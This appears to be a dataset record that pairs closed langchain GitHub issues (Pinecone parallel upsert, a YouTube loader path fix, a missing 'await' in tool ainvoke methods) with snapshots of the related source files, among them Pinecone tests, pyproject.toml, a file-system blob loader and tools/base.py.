k=1, namespace=namespace_name) # TODO: why metadata={"page": 0.0}) instead of {"page": 0}? assert output == [Document(page_content=needs, metadata={"page": 0.0})] @pytest.mark.vcr() def test_from_texts_with_scores(self, embedding_openai: OpenAIEmbeddings) -> None: """Test end to end construction and search with scores and IDs.""" texts = ["foo", "bar", "baz"] metadatas = [{"page": i} for i in range(len(texts))] docsearch = Pinecone.from_texts( texts, embedding_openai, index_name=index_name, metadatas=metadatas, namespace=namespace_name, ) output = docsearch.similarity_search_with_score( "foo", k=3, namespace=namespace_name ) docs = [o[0] for o in output] scores = [o[1] for o in output] sorted_documents = sorted(docs, key=lambda x: x.metadata["page"]) # TODO: why metadata={"page": 0.0}) instead of {"page": 0}, etc??? assert sorted_documents == [ Document(page_content="foo", metadata={"page": 0.0}), Document(page_content="bar", metadata={"page": 1.0}), Document(page_content="baz", metadata={"page": 2.0}), ] assert scores[0] > scores[1] > scores[2] def test_from_existing_index_with_namespaces( self, embedding_openai: OpenAIEmbeddings ) -> None: """Test that namespaces are properly handled.""" # Create two indexes with the same name but different namespaces texts_1 = ["foo", "bar", "baz"] metadatas = [{"page": i} for i in range(len(texts_1))] Pinecone.from_texts( texts_1, embedding_openai, index_name=index_name, metadatas=metadatas, namespace=f"{index_name}-1", ) texts_2 = ["foo2", "bar2", "baz2"] metadatas = [{"page": i} for i in range(len(texts_2))] Pinecone.from_texts( texts_2, embedding_openai, index_name=index_name, metadatas=metadatas, namespace=f"{index_name}-2", ) # Search with namespace docsearch = Pinecone.from_existing_index( index_name=index_name, embedding=embedding_openai, namespace=f"{index_name}-1", ) output = docsearch.similarity_search("foo", k=20, namespace=f"{index_name}-1") # check that we don't get results from the other namespace page_contents = sorted(set([o.page_content for o in output])) assert all(content in ["foo", "bar", "baz"] for content in page_contents) assert all(content not in ["foo2", "bar2", "baz2"] for content in page_contents) def test_add_documents_with_ids( self, texts: List[str], embedding_openai: OpenAIEmbeddings ) -> None: ids = [uuid.uuid4().hex for _ in range(len(texts))] Pinecone.from_texts( texts=texts, ids=ids, embedding=embedding_openai, index_name=index_name, namespace=index_name, ) index_stats = self.index.describe_index_stats() assert index_stats["namespaces"][index_name]["vector_count"] == len(texts) ids_1 = [uuid.uuid4().hex for _ in range(len(texts))] Pinecone.from_texts( texts=texts, ids=ids_1, embedding=embedding_openai, index_name=index_name, namespace=index_name, ) index_stats = self.index.describe_index_stats() assert index_stats["namespaces"][index_name]["vector_count"] == len(texts) * 2 assert index_stats["total_vector_count"] == len(texts) * 2 @pytest.mark.vcr() def test_relevance_score_bound(self, embedding_openai: OpenAIEmbeddings) -> None: """Ensures all relevance scores are between 0 and 1.""" texts = ["foo", "bar", "baz"] metadatas = [{"page": i} for i in range(len(texts))] docsearch = Pinecone.from_texts( texts, embedding_openai, index_name=index_name, metadatas=metadatas, ) # wait for the index to be ready time.sleep(20) output = docsearch.similarity_search_with_relevance_scores("foo", k=3) assert all( (1 >= score or np.isclose(score, 1)) and score >= 0 for _, score in output )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,855
Support index upsert parallelization for pinecone
### Feature request We can take advantage from pinecone parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel) This will require modification of the current `from_texts` pipeline to 1. Create a batch (chunk) for doing embeddings (ie have a chunk size of 1000 for embeddings) 2. Perform a parallel upsert to Pinecone index on that chunk This way we are in control on 3 things: 1. Thread pool for pinecone index 2. Parametrize the batch size for embeddings (ie it helps to avoid rate limit for OpenAI embeddings) 3. Parametrize the batch size for upsert (it helps to avoid throttling of pinecone API) As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts` as they are doing the similar thing. ### Motivation The function `from_text` and `add_text` for index upsert doesn't take advantage of parallelism especially when embeddings are calculated by HTTP calls (ie OpenAI embeddings). This makes the whole sequence inefficient from IO bound standpoint as the pipeline is following: 1. Take a small batch ie 32/64 of documents 2. Calculate embeddings --> WAIT 3. Upsert a batch --> WAIT We can benefit from either parallel upsert or we can utilize `asyncio`. ### Your contribution I will do it.
https://github.com/langchain-ai/langchain/issues/9855
https://github.com/langchain-ai/langchain/pull/9859
16a27ab244e6b92d74c48c206e0e6f1b5d00e126
4765c097035b9ff722fa9bbb7c3dd4eb6aed933c
"2023-08-28T13:09:29Z"
python
"2023-09-03T22:37:41Z"
pyproject.toml
[tool.poetry] name = "langchain-monorepo" version = "0.0.1" description = "LangChain mono-repo" authors = [] license = "MIT" readme = "README.md" repository = "https://www.github.com/langchain-ai/langchain" [tool.poetry.dependencies] python = ">=3.8.1,<4.0" [tool.poetry.group.docs.dependencies] langchain = { path = "libs/langchain/", develop = true } autodoc_pydantic = "^1.8.0" myst_parser = "^0.18.1" nbsphinx = "^0.8.9" sphinx = "^4.5.0" sphinx-autobuild = "^2021.3.14" sphinx_book_theme = "^0.3.3" sphinx_rtd_theme = "^1.0.0" sphinx-typlog-theme = "^0.8.0" sphinx-panels = "^0.6.0" toml = "^0.10.2" myst-nb = "^0.17.1" linkchecker = "^10.2.1" sphinx-copybutton = "^0.5.1" nbdoc = "^0.0.82" [tool.poetry.group.codespell.dependencies] codespell = "^2.2.0" [tool.codespell] skip = '.git,*.pdf,*.svg,*.pdf,*.yaml,*.ipynb,poetry.lock,*.min.js,*.css,package-lock.json,example_data,_dist,examples' # Ignore latin etc ignore-regex = '.*(Stati Uniti|Tense=Pres).*' # whats is a typo but used frequently in queries so kept as is # aapply - async apply # unsecure - typo but part of API, decided to not bother for now ignore-words-list = 'momento,collison,ned,foor,reworkd,parth,whats,aapply,mysogyny,unsecure,damon,crate'
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,019
fix: Loading documents from a Youtube Url
### System Info MacOS M2 13.4.1 (22F82) ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce behaviour: 1. Run the [tutorial](https://python.langchain.com/docs/integrations/document_loaders/youtube_audio) with the default parameters `save_dir = "~/Downloads/YouTube"` 2. After calling `docs = loader.load()` the docs will be empty I have implemented a dummy fix for the interim. The error is here in this file: from langchain.document_loaders.blob_loaders.youtube_audio import YoutubeAudioLoader `YouTubeAudioLoader.yield_blobs` method loader = FileSystemBlobLoader(self.save_dir, glob="*.m4a") ``` # This doesn't always work (MacOS) loader = FileSystemBlobLoader(self.save_dir, glob="*.m4a") ``` The reason it doesn't work is that it's trying to use ~/Downloads/YouTube. The fix I propose is either: - Use the FULL file path in `save_dir` in the tutorial. - Replace the problematic line with this, so that it finds the actual directory, even if you prefer to use `~` for specifying file paths. ``` loader = FileSystemBlobLoader(os.path.expanduser(self.save_dir), glob="*.m4a") ``` ### Expected behavior There should be documents in the loader.load() variable. ### My Fix ``` # Yield the written blobs """ you could fix save_dir like this... (old) save_dir = "~/Downloads/YouTube" (new) "/Users/shawnesquivel/Downloads/YouTube" """ # This doesn't always work (MacOS) loader = FileSystemBlobLoader(self.save_dir, glob="*.m4a") # This works loader = FileSystemBlobLoader(os.path.expanduser(self.save_dir), glob="*.m4a") ```
https://github.com/langchain-ai/langchain/issues/10019
https://github.com/langchain-ai/langchain/pull/10133
31bbe807583b4a53c9fd2fa98d8b4d1fe185ba40
e0f6ba08d6ad86226552d906e397a6a21f1904d0
"2023-08-31T03:19:25Z"
python
"2023-09-04T07:21:33Z"
libs/langchain/langchain/document_loaders/blob_loaders/file_system.py
"""Use to load blobs from the local file system.""" from pathlib import Path from typing import Callable, Iterable, Iterator, Optional, Sequence, TypeVar, Union from langchain.document_loaders.blob_loaders.schema import Blob, BlobLoader T = TypeVar("T") def _make_iterator( length_func: Callable[[], int], show_progress: bool = False ) -> Callable[[Iterable[T]], Iterator[T]]: """Create a function that optionally wraps an iterable in tqdm.""" if show_progress: try: from tqdm.auto import tqdm except ImportError: raise ImportError( "You must install tqdm to use show_progress=True." "You can install tqdm with `pip install tqdm`." ) # Make sure to provide `total` here so that tqdm can show # a progress bar that takes into account the total number of files. def _with_tqdm(iterable: Iterable[T]) -> Iterator[T]: """Wrap an iterable in a tqdm progress bar.""" return tqdm(iterable, total=length_func()) iterator = _with_tqdm else: iterator = iter # type: ignore return iterator # PUBLIC API class FileSystemBlobLoader(BlobLoader): """Load blobs in the local file system. Example: .. code-block:: python from langchain.document_loaders.blob_loaders import FileSystemBlobLoader loader = FileSystemBlobLoader("/path/to/directory") for blob in loader.yield_blobs(): print(blob) """ def __init__( self, path: Union[str, Path], *, glob: str = "**/[!.]*", exclude: Sequence[str] = (), suffixes: Optional[Sequence[str]] = None, show_progress: bool = False, ) -> None: """Initialize with a path to directory and how to glob over it. Args: path: Path to directory to load from glob: Glob pattern relative to the specified path by default set to pick up all non-hidden files exclude: patterns to exclude from results, use glob syntax suffixes: Provide to keep only files with these suffixes Useful when wanting to keep files with different suffixes Suffixes must include the dot, e.g. ".txt" show_progress: If true, will show a progress bar as the files are loaded. This forces an iteration through all matching files to count them prior to loading them. Examples: .. code-block:: python # Recursively load all text files in a directory. loader = FileSystemBlobLoader("/path/to/directory", glob="**/*.txt") # Recursively load all non-hidden files in a directory. loader = FileSystemBlobLoader("/path/to/directory", glob="**/[!.]*") # Load all files in a directory without recursion. loader = FileSystemBlobLoader("/path/to/directory", glob="*") # Recursively load all files in a directory, except for py or pyc files. loader = FileSystemBlobLoader( "/path/to/directory", glob="**/*.txt", exclude=["**/*.py", "**/*.pyc"] ) """ if isinstance(path, Path): _path = path elif isinstance(path, str): _path = Path(path) else: raise TypeError(f"Expected str or Path, got {type(path)}") self.path = _path self.glob = glob self.suffixes = set(suffixes or []) self.show_progress = show_progress self.exclude = exclude def yield_blobs( self, ) -> Iterable[Blob]: """Yield blobs that match the requested pattern.""" iterator = _make_iterator( length_func=self.count_matching_files, show_progress=self.show_progress ) for path in iterator(self._yield_paths()): yield Blob.from_path(path) def _yield_paths(self) -> Iterable[Path]: """Yield paths that match the requested pattern.""" paths = self.path.glob(self.glob) for path in paths: if self.exclude: if any(path.match(glob) for glob in self.exclude): continue if path.is_file(): if self.suffixes and path.suffix not in self.suffixes: continue yield path def count_matching_files(self) -> int: """Count files that match the pattern without loading them.""" # Carry out a full iteration to count the files without # materializing anything expensive in memory. num = 0 for _ in self._yield_paths(): num += 1 return num
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,080
StructuredTool ainvoke isn't await parent class ainvoke
[code pointer](https://github.com/langchain-ai/langchain/blob/74fcfed4e2bdd186c2869a07008175a9b66b1ed4/libs/langchain/langchain/tools/base.py#L588C16-L588C16) In `langchain.tools.base`, change ```python Class StructuredTool(BaseTool): """Tool that can operate on any number of inputs.""" description: str = "" args_schema: Type[BaseModel] = Field(..., description="The tool schema.") """The input arguments' schema.""" func: Optional[Callable[..., Any]] """The function to run when the tool is called.""" coroutine: Optional[Callable[..., Awaitable[Any]]] = None """The asynchronous version of the function.""" # --- Runnable --- async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if not self.coroutine: # If the tool does not implement async, fall back to default implementation return await asyncio.get_running_loop().run_in_executor( None, partial(self.invoke, input, config, **kwargs) ) return super().ainvoke(input, config, **kwargs) ``` to ```python Class StructuredTool(BaseTool): """Tool that can operate on any number of inputs.""" description: str = "" args_schema: Type[BaseModel] = Field(..., description="The tool schema.") """The input arguments' schema.""" func: Optional[Callable[..., Any]] """The function to run when the tool is called.""" coroutine: Optional[Callable[..., Awaitable[Any]]] = None """The asynchronous version of the function.""" # --- Runnable --- async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if not self.coroutine: # If the tool does not implement async, fall back to default implementation return await asyncio.get_running_loop().run_in_executor( None, partial(self.invoke, input, config, **kwargs) ) return await super().ainvoke(input, config, **kwargs) ```
https://github.com/langchain-ai/langchain/issues/10080
https://github.com/langchain-ai/langchain/pull/10300
fdba711d28375e86b23cfbad10a17feb67276ef5
28de8d132c8c4f7ecfe246c61375d91a04ff0abf
"2023-09-01T07:36:50Z"
python
"2023-09-08T02:54:53Z"
libs/langchain/langchain/tools/base.py
"""Base implementation for tools or skills.""" from __future__ import annotations import asyncio import inspect import warnings from abc import abstractmethod from functools import partial from inspect import signature from typing import Any, Awaitable, Callable, Dict, List, Optional, Tuple, Type, Union from langchain.callbacks.base import BaseCallbackManager from langchain.callbacks.manager import ( AsyncCallbackManager, AsyncCallbackManagerForToolRun, CallbackManager, CallbackManagerForToolRun, Callbacks, ) from langchain.pydantic_v1 import ( BaseModel, Extra, Field, create_model, root_validator, validate_arguments, ) from langchain.schema.runnable import Runnable, RunnableConfig class SchemaAnnotationError(TypeError): """Raised when 'args_schema' is missing or has an incorrect type annotation.""" def _create_subset_model( name: str, model: BaseModel, field_names: list ) -> Type[BaseModel]: """Create a pydantic model with only a subset of model's fields.""" fields = {} for field_name in field_names: field = model.__fields__[field_name] fields[field_name] = (field.outer_type_, field.field_info) return create_model(name, **fields) # type: ignore def _get_filtered_args( inferred_model: Type[BaseModel], func: Callable, ) -> dict: """Get the arguments from a function's signature.""" schema = inferred_model.schema()["properties"] valid_keys = signature(func).parameters return {k: schema[k] for k in valid_keys if k not in ("run_manager", "callbacks")} class _SchemaConfig: """Configuration for the pydantic model.""" extra: Any = Extra.forbid arbitrary_types_allowed: bool = True def create_schema_from_function( model_name: str, func: Callable, ) -> Type[BaseModel]: """Create a pydantic schema from a function's signature. Args: model_name: Name to assign to the generated pydandic schema func: Function to generate the schema from Returns: A pydantic model with the same arguments as the function """ # https://docs.pydantic.dev/latest/usage/validation_decorator/ validated = validate_arguments(func, config=_SchemaConfig) # type: ignore inferred_model = validated.model # type: ignore if "run_manager" in inferred_model.__fields__: del inferred_model.__fields__["run_manager"] if "callbacks" in inferred_model.__fields__: del inferred_model.__fields__["callbacks"] # Pydantic adds placeholder virtual fields we need to strip valid_properties = _get_filtered_args(inferred_model, func) return _create_subset_model( f"{model_name}Schema", inferred_model, list(valid_properties) ) class ToolException(Exception): """An optional exception that tool throws when execution error occurs. When this exception is thrown, the agent will not stop working, but will handle the exception according to the handle_tool_error variable of the tool, and the processing result will be returned to the agent as observation, and printed in red on the console. """ pass class BaseTool(BaseModel, Runnable[Union[str, Dict], Any]): """Interface LangChain tools must implement.""" def __init_subclass__(cls, **kwargs: Any) -> None: """Create the definition of the new tool class.""" super().__init_subclass__(**kwargs) args_schema_type = cls.__annotations__.get("args_schema", None) if args_schema_type is not None: if args_schema_type is None or args_schema_type == BaseModel: # Throw errors for common mis-annotations. # TODO: Use get_args / get_origin and fully # specify valid annotations. typehint_mandate = """ class ChildTool(BaseTool): ... args_schema: Type[BaseModel] = SchemaClass ...""" name = cls.__name__ raise SchemaAnnotationError( f"Tool definition for {name} must include valid type annotations" f" for argument 'args_schema' to behave as expected.\n" f"Expected annotation of 'Type[BaseModel]'" f" but got '{args_schema_type}'.\n" f"Expected class looks like:\n" f"{typehint_mandate}" ) name: str """The unique name of the tool that clearly communicates its purpose.""" description: str """Used to tell the model how/when/why to use the tool. You can provide few-shot examples as a part of the description. """ args_schema: Optional[Type[BaseModel]] = None """Pydantic model class to validate and parse the tool's input arguments.""" return_direct: bool = False """Whether to return the tool's output directly. Setting this to True means that after the tool is called, the AgentExecutor will stop looping. """ verbose: bool = False """Whether to log the tool's progress.""" callbacks: Callbacks = Field(default=None, exclude=True) """Callbacks to be called during tool execution.""" callback_manager: Optional[BaseCallbackManager] = Field(default=None, exclude=True) """Deprecated. Please use callbacks instead.""" tags: Optional[List[str]] = None """Optional list of tags associated with the tool. Defaults to None These tags will be associated with each call to this tool, and passed as arguments to the handlers defined in `callbacks`. You can use these to eg identify a specific instance of a tool with its use case. """ metadata: Optional[Dict[str, Any]] = None """Optional metadata associated with the tool. Defaults to None This metadata will be associated with each call to this tool, and passed as arguments to the handlers defined in `callbacks`. You can use these to eg identify a specific instance of a tool with its use case. """ handle_tool_error: Optional[ Union[bool, str, Callable[[ToolException], str]] ] = False """Handle the content of the ToolException thrown.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def is_single_input(self) -> bool: """Whether the tool only accepts a single input.""" keys = {k for k in self.args if k != "kwargs"} return len(keys) == 1 @property def args(self) -> dict: if self.args_schema is not None: return self.args_schema.schema()["properties"] else: schema = create_schema_from_function(self.name, self._run) return schema.schema()["properties"] # --- Runnable --- def invoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: config = config or {} return self.run( input, callbacks=config.get("callbacks"), tags=config.get("tags"), metadata=config.get("metadata"), **kwargs, ) async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if type(self)._arun == BaseTool._arun: # If the tool does not implement async, fall back to default implementation return super().ainvoke(input, config, **kwargs) config = config or {} return await self.arun( input, callbacks=config.get("callbacks"), tags=config.get("tags"), metadata=config.get("metadata"), **kwargs, ) # --- Tool --- def _parse_input( self, tool_input: Union[str, Dict], ) -> Union[str, Dict[str, Any]]: """Convert tool input to pydantic model.""" input_args = self.args_schema if isinstance(tool_input, str): if input_args is not None: key_ = next(iter(input_args.__fields__.keys())) input_args.validate({key_: tool_input}) return tool_input else: if input_args is not None: result = input_args.parse_obj(tool_input) return {k: v for k, v in result.dict().items() if k in tool_input} return tool_input @root_validator() def raise_deprecation(cls, values: Dict) -> Dict: """Raise deprecation warning if callback_manager is used.""" if values.get("callback_manager") is not None: warnings.warn( "callback_manager is deprecated. Please use callbacks instead.", DeprecationWarning, ) values["callbacks"] = values.pop("callback_manager", None) return values @abstractmethod def _run( self, *args: Any, **kwargs: Any, ) -> Any: """Use the tool. Add run_manager: Optional[CallbackManagerForToolRun] = None to child implementations to enable tracing, """ async def _arun( self, *args: Any, **kwargs: Any, ) -> Any: """Use the tool asynchronously. Add run_manager: Optional[AsyncCallbackManagerForToolRun] = None to child implementations to enable tracing, """ return await asyncio.get_running_loop().run_in_executor( None, partial(self._run, **kwargs), *args, ) def _to_args_and_kwargs(self, tool_input: Union[str, Dict]) -> Tuple[Tuple, Dict]: # For backwards compatibility, if run_input is a string, # pass as a positional argument. if isinstance(tool_input, str): return (tool_input,), {} else: return (), tool_input def run( self, tool_input: Union[str, Dict], verbose: Optional[bool] = None, start_color: Optional[str] = "green", color: Optional[str] = "green", callbacks: Callbacks = None, *, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run the tool.""" parsed_input = self._parse_input(tool_input) if not self.verbose and verbose is not None: verbose_ = verbose else: verbose_ = self.verbose callback_manager = CallbackManager.configure( callbacks, self.callbacks, verbose_, tags, self.tags, metadata, self.metadata, ) # TODO: maybe also pass through run_manager is _run supports kwargs new_arg_supported = signature(self._run).parameters.get("run_manager") run_manager = callback_manager.on_tool_start( {"name": self.name, "description": self.description}, tool_input if isinstance(tool_input, str) else str(tool_input), color=start_color, **kwargs, ) try: tool_args, tool_kwargs = self._to_args_and_kwargs(parsed_input) observation = ( self._run(*tool_args, run_manager=run_manager, **tool_kwargs) if new_arg_supported else self._run(*tool_args, **tool_kwargs) ) except ToolException as e: if not self.handle_tool_error: run_manager.on_tool_error(e) raise e elif isinstance(self.handle_tool_error, bool): if e.args: observation = e.args[0] else: observation = "Tool execution error" elif isinstance(self.handle_tool_error, str): observation = self.handle_tool_error elif callable(self.handle_tool_error): observation = self.handle_tool_error(e) else: raise ValueError( f"Got unexpected type of `handle_tool_error`. Expected bool, str " f"or callable. Received: {self.handle_tool_error}" ) run_manager.on_tool_end( str(observation), color="red", name=self.name, **kwargs ) return observation except (Exception, KeyboardInterrupt) as e: run_manager.on_tool_error(e) raise e else: run_manager.on_tool_end( str(observation), color=color, name=self.name, **kwargs ) return observation async def arun( self, tool_input: Union[str, Dict], verbose: Optional[bool] = None, start_color: Optional[str] = "green", color: Optional[str] = "green", callbacks: Callbacks = None, *, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run the tool asynchronously.""" parsed_input = self._parse_input(tool_input) if not self.verbose and verbose is not None: verbose_ = verbose else: verbose_ = self.verbose callback_manager = AsyncCallbackManager.configure( callbacks, self.callbacks, verbose_, tags, self.tags, metadata, self.metadata, ) new_arg_supported = signature(self._arun).parameters.get("run_manager") run_manager = await callback_manager.on_tool_start( {"name": self.name, "description": self.description}, tool_input if isinstance(tool_input, str) else str(tool_input), color=start_color, **kwargs, ) try: # We then call the tool on the tool input to get an observation tool_args, tool_kwargs = self._to_args_and_kwargs(parsed_input) observation = ( await self._arun(*tool_args, run_manager=run_manager, **tool_kwargs) if new_arg_supported else await self._arun(*tool_args, **tool_kwargs) ) except ToolException as e: if not self.handle_tool_error: await run_manager.on_tool_error(e) raise e elif isinstance(self.handle_tool_error, bool): if e.args: observation = e.args[0] else: observation = "Tool execution error" elif isinstance(self.handle_tool_error, str): observation = self.handle_tool_error elif callable(self.handle_tool_error): observation = self.handle_tool_error(e) else: raise ValueError( f"Got unexpected type of `handle_tool_error`. Expected bool, str " f"or callable. Received: {self.handle_tool_error}" ) await run_manager.on_tool_end( str(observation), color="red", name=self.name, **kwargs ) return observation except (Exception, KeyboardInterrupt) as e: await run_manager.on_tool_error(e) raise e else: await run_manager.on_tool_end( str(observation), color=color, name=self.name, **kwargs ) return observation def __call__(self, tool_input: str, callbacks: Callbacks = None) -> str: """Make tool callable.""" return self.run(tool_input, callbacks=callbacks) class Tool(BaseTool): """Tool that takes in function or coroutine directly.""" description: str = "" func: Optional[Callable[..., str]] """The function to run when the tool is called.""" coroutine: Optional[Callable[..., Awaitable[str]]] = None """The asynchronous version of the function.""" # --- Runnable --- async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if not self.coroutine: # If the tool does not implement async, fall back to default implementation return await asyncio.get_running_loop().run_in_executor( None, partial(self.invoke, input, config, **kwargs) ) return super().ainvoke(input, config, **kwargs) # --- Tool --- @property def args(self) -> dict: """The tool's input arguments.""" if self.args_schema is not None: return self.args_schema.schema()["properties"] # For backwards compatibility, if the function signature is ambiguous, # assume it takes a single string input. return {"tool_input": {"type": "string"}} def _to_args_and_kwargs(self, tool_input: Union[str, Dict]) -> Tuple[Tuple, Dict]: """Convert tool input to pydantic model.""" args, kwargs = super()._to_args_and_kwargs(tool_input) # For backwards compatibility. The tool must be run with a single input all_args = list(args) + list(kwargs.values()) if len(all_args) != 1: raise ToolException( f"Too many arguments to single-input tool {self.name}." f" Args: {all_args}" ) return tuple(all_args), {} def _run( self, *args: Any, run_manager: Optional[CallbackManagerForToolRun] = None, **kwargs: Any, ) -> Any: """Use the tool.""" if self.func: new_argument_supported = signature(self.func).parameters.get("callbacks") return ( self.func( *args, callbacks=run_manager.get_child() if run_manager else None, **kwargs, ) if new_argument_supported else self.func(*args, **kwargs) ) raise NotImplementedError("Tool does not support sync") async def _arun( self, *args: Any, run_manager: Optional[AsyncCallbackManagerForToolRun] = None, **kwargs: Any, ) -> Any: """Use the tool asynchronously.""" if self.coroutine: new_argument_supported = signature(self.coroutine).parameters.get( "callbacks" ) return ( await self.coroutine( *args, callbacks=run_manager.get_child() if run_manager else None, **kwargs, ) if new_argument_supported else await self.coroutine(*args, **kwargs) ) else: return await asyncio.get_running_loop().run_in_executor( None, partial(self._run, run_manager=run_manager, **kwargs), *args ) # TODO: this is for backwards compatibility, remove in future def __init__( self, name: str, func: Optional[Callable], description: str, **kwargs: Any ) -> None: """Initialize tool.""" super(Tool, self).__init__( name=name, func=func, description=description, **kwargs ) @classmethod def from_function( cls, func: Optional[Callable], name: str, # We keep these required to support backwards compatibility description: str, return_direct: bool = False, args_schema: Optional[Type[BaseModel]] = None, coroutine: Optional[ Callable[..., Awaitable[Any]] ] = None, # This is last for compatibility, but should be after func **kwargs: Any, ) -> Tool: """Initialize tool from a function.""" if func is None and coroutine is None: raise ValueError("Function and/or coroutine must be provided") return cls( name=name, func=func, coroutine=coroutine, description=description, return_direct=return_direct, args_schema=args_schema, **kwargs, ) class StructuredTool(BaseTool): """Tool that can operate on any number of inputs.""" description: str = "" args_schema: Type[BaseModel] = Field(..., description="The tool schema.") """The input arguments' schema.""" func: Optional[Callable[..., Any]] """The function to run when the tool is called.""" coroutine: Optional[Callable[..., Awaitable[Any]]] = None """The asynchronous version of the function.""" # --- Runnable --- async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if not self.coroutine: # If the tool does not implement async, fall back to default implementation return await asyncio.get_running_loop().run_in_executor( None, partial(self.invoke, input, config, **kwargs) ) return super().ainvoke(input, config, **kwargs) # --- Tool --- @property def args(self) -> dict: """The tool's input arguments.""" return self.args_schema.schema()["properties"] def _run( self, *args: Any, run_manager: Optional[CallbackManagerForToolRun] = None, **kwargs: Any, ) -> Any: """Use the tool.""" if self.func: new_argument_supported = signature(self.func).parameters.get("callbacks") return ( self.func( *args, callbacks=run_manager.get_child() if run_manager else None, **kwargs, ) if new_argument_supported else self.func(*args, **kwargs) ) raise NotImplementedError("Tool does not support sync") async def _arun( self, *args: Any, run_manager: Optional[AsyncCallbackManagerForToolRun] = None, **kwargs: Any, ) -> str: """Use the tool asynchronously.""" if self.coroutine: new_argument_supported = signature(self.coroutine).parameters.get( "callbacks" ) return ( await self.coroutine( *args, callbacks=run_manager.get_child() if run_manager else None, **kwargs, ) if new_argument_supported else await self.coroutine(*args, **kwargs) ) return await asyncio.get_running_loop().run_in_executor( None, self._run, partial(self._run, run_manager=run_manager, **kwargs), *args, ) @classmethod def from_function( cls, func: Optional[Callable] = None, coroutine: Optional[Callable[..., Awaitable[Any]]] = None, name: Optional[str] = None, description: Optional[str] = None, return_direct: bool = False, args_schema: Optional[Type[BaseModel]] = None, infer_schema: bool = True, **kwargs: Any, ) -> StructuredTool: """Create tool from a given function. A classmethod that helps to create a tool from a function. Args: func: The function from which to create a tool coroutine: The async function from which to create a tool name: The name of the tool. Defaults to the function name description: The description of the tool. Defaults to the function docstring return_direct: Whether to return the result directly or as a callback args_schema: The schema of the tool's input arguments infer_schema: Whether to infer the schema from the function's signature **kwargs: Additional arguments to pass to the tool Returns: The tool Examples: .. code-block:: python def add(a: int, b: int) -> int: \"\"\"Add two numbers\"\"\" return a + b tool = StructuredTool.from_function(add) tool.run(1, 2) # 3 """ if func is not None: source_function = func elif coroutine is not None: source_function = coroutine else: raise ValueError("Function and/or coroutine must be provided") name = name or source_function.__name__ description = description or source_function.__doc__ if description is None: raise ValueError( "Function must have a docstring if description not provided." ) # Description example: # search_api(query: str) - Searches the API for the query. sig = signature(source_function) description = f"{name}{sig} - {description.strip()}" _args_schema = args_schema if _args_schema is None and infer_schema: _args_schema = create_schema_from_function(f"{name}Schema", source_function) return cls( name=name, func=func, coroutine=coroutine, args_schema=_args_schema, description=description, return_direct=return_direct, **kwargs, ) def tool( *args: Union[str, Callable], return_direct: bool = False, args_schema: Optional[Type[BaseModel]] = None, infer_schema: bool = True, ) -> Callable: """Make tools out of functions, can be used with or without arguments. Args: *args: The arguments to the tool. return_direct: Whether to return directly from the tool rather than continuing the agent loop. args_schema: optional argument schema for user to specify infer_schema: Whether to infer the schema of the arguments from the function's signature. This also makes the resultant tool accept a dictionary input to its `run()` function. Requires: - Function must be of type (str) -> str - Function must have a docstring Examples: .. code-block:: python @tool def search_api(query: str) -> str: # Searches the API for the query. return @tool("search", return_direct=True) def search_api(query: str) -> str: # Searches the API for the query. return """ def _make_with_name(tool_name: str) -> Callable: def _make_tool(dec_func: Callable) -> BaseTool: if inspect.iscoroutinefunction(dec_func): coroutine = dec_func func = None else: coroutine = None func = dec_func if infer_schema or args_schema is not None: return StructuredTool.from_function( func, coroutine, name=tool_name, return_direct=return_direct, args_schema=args_schema, infer_schema=infer_schema, ) # If someone doesn't want a schema applied, we must treat it as # a simple string->string function if func.__doc__ is None: raise ValueError( "Function must have a docstring if " "description not provided and infer_schema is False." ) return Tool( name=tool_name, func=func, description=f"{tool_name} tool", return_direct=return_direct, coroutine=coroutine, ) return _make_tool if len(args) == 1 and isinstance(args[0], str): # if the argument is a string, then we use the string as the tool name # Example usage: @tool("search", return_direct=True) return _make_with_name(args[0]) elif len(args) == 1 and callable(args[0]): # if the argument is a function, then we use the function name as the tool name # Example usage: @tool return _make_with_name(args[0].__name__)(args[0]) elif len(args) == 0: # if there are no arguments, then we use the function name as the tool name # Example usage: @tool(return_direct=True) def _partial(func: Callable[[str], str]) -> BaseTool: return _make_with_name(func.__name__)(func) return _partial else: raise ValueError("Too many arguments for tool decorator")
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,378
DOC: Incorrect and confusing documentation of AIMessagePromptTemplate and HumanMessagePromptTemplate
